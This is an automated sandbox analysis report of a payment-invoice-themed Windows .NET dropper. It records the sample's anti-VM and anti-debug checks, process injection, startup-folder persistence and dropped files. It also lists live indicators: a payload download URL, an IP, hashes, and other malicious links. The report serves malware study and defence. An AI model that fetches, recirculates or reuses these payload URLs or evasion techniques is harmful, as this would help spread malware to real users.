Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -99534s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -99406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -99187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -99078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -98968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -98855s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -98734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -98624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -98513s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -98306s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -98168s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -97991s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -97875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -97762s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -97656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -97547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -97437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -97328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -97219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -97109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -97000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -96890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -96781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -96672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -96562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -96453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -96343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -96234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -96125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -96015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756	Thread sleep time: -95906s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 99869	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 99534	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 99406	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 99187	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 99078	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 98968	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 98855	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 98734	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 98624	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 98513	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 98306	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 98168	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 97991	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 97875	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 97762	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 97656	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 97547	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 97437	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 97328	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 97219	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 97109	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 97000	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 96890	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 96781	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 96672	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 96562	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 96453	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 96343	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 96234	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 96125	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 96015	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Thread delayed: delay time: 95906	Jump to behavior

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626014604.0000000000C13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXs<
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Memory written: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe base: 550000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Process created: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe "C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe"

Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Queries volume information: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Queries volume information: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	18%	ReversingLabs
MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	100%	Avira	HEUR/AGEN.1323343
MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\scriptcase-php8.exe	100%	Avira	HEUR/AGEN.1323343
C:\Users\user\AppData\Local\scriptcase-php8.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\scriptcase-php8.exe	18%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://xianggrhen.com	0%	Avira URL Cloud	safe
http://xianggrhen.com/camp/Reibbfkkyy.dat	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xianggrhen.com	45.9.191.182	true	false		unknown
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://xianggrhen.com/camp/Reibbfkkyy.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-net	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://xianggrhen.com	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002871000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.9.191.182	xianggrhen.com	Germany		47583	AS-HOSTINGERLT	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569870
Start date and time:	2024-12-06 11:04:32 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Detection:	MAL
Classification:	mal100.expl.evad.winEXE@4/3@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 89% Number of executed functions: 75 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, PID 8140 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Simulations

Behavior and APIs

Time	Type	Description
05:05:28	API Interceptor	36x Sleep call for process: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe modified
11:06:02	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.9.191.182	DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exe	Get hash	malicious	Unknown	Browse	xianggrhen.com/desk/Tbddfcris.vdf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xianggrhen.com	DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exe	Get hash	malicious	Unknown	Browse	45.9.191.182
xianggrhen.com	AMTR-TT4781-SWFT-U4Y81-SO39-C37AR-AO937-CNR742-S3782-2818DY-9A82.exe	Get hash	malicious	Unknown	Browse	92.113.29.113
s-part-0035.t-0009.t-msedge.net	5Xt3byH0Pj.exe	Get hash	malicious	XenoRAT	Browse	13.107.246.63
	1733477410159edf9b85a179e6cba033f8cb2d5a86e8ca4544f9e9f23b783f46e15a7ae1a2802.dat-decoded.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	2E7y4M3fki.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	Rubik_v3.3.1.xlsm	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	mB7FXeHdAz.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	YEV8DgcIvI.exe	Get hash	malicious	Petya	Browse	13.107.246.63
	8DThWiH5B7.exe	Get hash	malicious	DCRat	Browse	13.107.246.63
	xN0kb0SVOQ.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	QUOTATON-37839993.exe	Get hash	malicious	FormBook	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-HOSTINGERLT	DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exe	Get hash	malicious	Unknown	Browse	45.9.191.182
	https://application-workspace.com/red-bull/id-38772	Get hash	malicious	Unknown	Browse	45.84.207.234
	https://clickme.thryv.com/ls/click?upn=u001.5-2B1Zlj-2BwCegXqgd6Um7kY0JRT8UgUE3u1rWR4YFASxlUU28BkvglW4Sw74FAirirfRSk_jzclrAiO28PBUU1ZLf2yC1YJEF5Rt8zDnz4yKbEuFqXf3c0fVOhzL2fXxOYix3CjCrzlLwoIPSXb9PavK50mtpdK-2FWF7thydb3q6E5ptEQjRRfcuGnHeO06MZmpQ9Md6EqF3tHpTnJtwnRl07eBC-2BbeqGDZkqEsFQ9fh8CwKb92GLRs9xjA4K3L0qiP8u-2BrdM8wHoplpWV7e4Ic88yYySdEC6BFxZgKH7uN8ysaI5ELMcoW165-2BlUHwvAK7b88Y-2FPYUokK9PeBa-2FcZkvlS9nh3pVTeDrVNhWWvISMX1rFpeltySyG2xWyMwf0YLv9gS0X1AE0s7oDERqOcaTwfLsXQxoV99DX1bVNLU7d5FQCgc-3D#C?email=heath.teresa@aidb.org	Get hash	malicious	Unknown	Browse	31.170.162.164
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	46.17.173.161
	http://nemoinsure.com	Get hash	malicious	Unknown	Browse	195.110.59.5
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	31.170.162.164
	I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg	Get hash	malicious	Mint Stealer	Browse	195.110.59.166
	https://kunnskapsfilm.no	Get hash	malicious	Unknown	Browse	45.93.125.64
	https://ssintegra.com/Noel/webb/index.html	Get hash	malicious	Unknown	Browse	212.1.210.77
	https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yL	Get hash	malicious	Ratty	Browse	31.220.53.231

Process:	C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1845544
Entropy (8bit):	5.625794477334237
Encrypted:	false
SSDEEP:	24576:SIUT3GoAMU+DrPSD1DNqETFyuvc0Mr/QqAX9WLJFvIjzFB4Kac:B9FMFPeYET0uvoQp9WzAjzFBZ
MD5:	622B4FB4E2D8E9A803F526A77C867590
SHA1:	ECFAC03A1DE7CBEF3B10F0E73C251B77EDB63969
SHA-256:	006C7725348C5FE7EF76CBCE10E36C8CC5BA01C484D1107F63A29768D11DCE86
SHA-512:	CE0B562A070824BF92ECF77326DA12F7EEBF921C7912A71A0865CBE0FC37764A9B81B1974670BF2E36DD2D2853FAA7A642CA6C83B6A283A51E7E069728B7DC54
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?.Rg.................^...........\|... ........@.. .......................@............`.................................p\|..K......................(/... ....................................................... ............... ..H............text....\... ...^.................. ..`.rsrc...............`..............@..@.reloc....... ......................@..B.................\|......H...........(...............................................................(......(......0.......... ........8........E............+...8)...s...... ....~....{2...:....& ....8.........r...p(....o.... ....~....{U...:....& ....8........E....S...G.......y...V.............../...z...8N...........io...... ....8......o...... ....~....{....:....& ....8..... ........8y...8.... ....~....{....:d...& ....8Y...... ....8L....s....r3..ps....(....o...... ....~....{F...:....& ....8.......

C:\Users\user\AppData\Local\scriptcase-php8.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
